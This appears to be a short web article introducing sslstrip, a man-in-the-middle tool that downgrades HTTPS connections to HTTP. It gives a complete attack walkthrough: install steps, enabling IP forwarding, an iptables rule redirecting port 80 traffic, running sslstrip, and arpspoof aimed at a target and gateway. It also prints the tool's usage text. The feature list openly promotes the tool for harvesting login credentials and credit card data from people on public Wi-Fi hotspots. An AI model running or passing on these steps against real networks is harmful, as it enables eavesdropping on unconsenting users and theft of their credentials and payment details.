Sslstrip is a MITM (Man in the Middle) tool which exploits the SSL stripping attack demonstrated by Moxie Marlinespike at Black Hat DC 2009. This attack downgrades the target’s connection from HTTPS to HTTP and allows the user to eavesdrop and access the data of the target.
sslstrip: A Tool for Exploiting SSL Stripping Attack
This MiTM tool will first transparently hijack the HTTP traffic on the targets network and then watch for HTTPS links and redirects then automatically transform them into HTTP links. Basically, sslstrip is ‘stripping’ or removing the SSL layer of security present on HTTPS links. This will potentially allow the user to access any data which the target may enter on websites. sslstrip convinces the target that the user’s MAC address is the same as the router’s MAC address, allowing the user to receive all the information from the target and then forward the traffic to its original destination.
- Very useful in public locations through Wi-fi hotspots.
- Allows user to find login credentials, credit card information and possibly other personal information of the user.
- Converts HTTPS requests into HTTP requests.
- Can show a favicon which looks like a lock icon.
- Python 2.5+
- Python ‘twisted-web’ module
$ sudo apt-get install python-twisted-web
Clone the GitHub repo:
$ git clone https://github.com/moxie0/sslstrip.git
Navigate to the working directory and install the requirements:
$ cd sslstrip-0.9 $ sudo python ./setup.py install
Flip your machine into forwarding mode:
$ echo "1" > /proc/sys/net/ipv4/ip_forward
Setup iptables to redirect HTTP traffic to sslstrip:
$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
$ sslstrip.py -l <listenPort>
Run arpspoof to convince the network they should send their traffic to you:
$ arpspoof -i <interface> -t <targetIP> <gatewayIP>
sslstrip 0.9 by Moxie Marlinspike Usage: sslstrip <options> Options: -w <filename>, --write=<filename> Specify file to log to (optional). -p , --post Log only SSL POSTs. (default) -s , --ssl Log all SSL traffic to and from server. -a , --all Log all SSL and HTTP traffic to and from server. -l <port>, --listen=<port> Port to listen on (default 10000). -f , --favicon Substitute a lock favicon on secure requests. -k , --killsessions Kill sessions in progress. -h Print this help message.